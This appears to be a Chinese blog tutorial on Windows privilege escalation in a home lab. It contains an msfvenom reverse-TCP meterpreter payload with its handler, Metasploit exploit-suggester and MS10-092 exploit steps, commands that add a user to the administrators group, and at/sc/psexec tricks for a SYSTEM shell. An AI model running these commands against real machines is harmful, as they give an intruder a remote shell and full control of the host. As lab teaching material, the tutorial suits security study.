您现在的位置是:首页 >技术杂谈 >【网络安全】--win提权网站首页技术杂谈

【网络安全】--win提权

边缘拼命划水的小陈 2024-06-11 15:20:04
简介【网络安全】--win提权

提权目的

提高自己的执行权限,已完成更多高权限才拥有的特权

提权常用命令

whoami #查看当前用户权限

在这里插入图片描述

systeminfo # 查看操作系统及补丁情况

在这里插入图片描述

ipconfig #查看ip

在这里插入图片描述

net user #查看当前用户情况

在这里插入图片描述

netstat #查看当前网络连接情况(只有tcp)
netstat -ano #显示出tcp和udp连接情况

在这里插入图片描述

netstat -an | find “ESTABLISHED” #查看开启状态下的网络情况

在这里插入图片描述

tasklist #进程列表

在这里插入图片描述

taskkill -pid xxx #停止进程
net start #启动进程
net stop #停止进程
net user best 123456 /add #添加用户名为best 密码为123456的用户
net localgroup administrators best /add #将用户名为bast的用户添加到管理组
net user best /del #删除best用户

提权实战

常见的payload利用
KB2592799
KB3000061
KB2592799
1. 安装虚拟机win2008和kali

具体安装步骤详见https://blog.csdn.net/qq_41158271/article/details/127029119?spm=1001.2014.3001.5501

在这里插入图片描述

2. 创建普通用户

在这里插入图片描述
在这里插入图片描述

net user 用户名  密码 /add    #创建用户
net user #查看已有用户

在这里插入图片描述

3. 切换用户

在这里插入图片描述

4. kali生成木马并发送到被攻击服务器上
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe>shell.exe
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.107
exploit

具体使用方法详见https://blog.csdn.net/qq_41158271/article/details/130362377?spm=1001.2014.3001.5502
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5. 被攻击方运行生成的木马文件

在这里插入图片描述
6. 查看监听是否连接成功并查看权限

在这里插入图片描述

7. 查看可利用漏洞

方法一:

run post/multi/recon/local_exploit_suggester   #查找可识别的漏洞

在这里插入图片描述
方法二:

run post/windows/gather/enum_patches  #查找未打补丁的漏洞

在这里插入图片描述

方法三:

使用wes或windowsVulnscan工具对比systeminfo信息查找未打补丁的漏洞(与方法二原理一致)

下载地址:https://github.com/bitsadmin/wesng
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

8. 尝试利用exp提权

在这里插入图片描述
尝试使用此漏洞提权

backgroud  #切换到后台
show sessions #查看存在的会话
search ms10_092  #查找ms10_092漏洞可利用payload
use exploit/windows/local/ms10_092_schelevator #使用payload
show options #展示设置选项
set LHOST 192.168.0.107
run #运行

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
》》我这里未成功提升权限,具体步骤为上述步骤

at/sc/ps命令提权

at命令提权
at xx:xx /interactive cmd.exe  

当使用at命令设置定时计划后,执行时将会使用system权限运行,仅适用与win2007之前发布的系统
本次实验系统为win2003

在这里插入图片描述
在这里插入图片描述

sc命令提权
sc Create syscmd binPath = "cmd /k start" type= own type= interact #先创建服务
sc start syscmd #运行服务

适用于win7之前系统
在这里插入图片描述

ps命令提权

前提条件:需下载PsTools

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec.exe -accepteula -s -i -d cmd.exe
风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。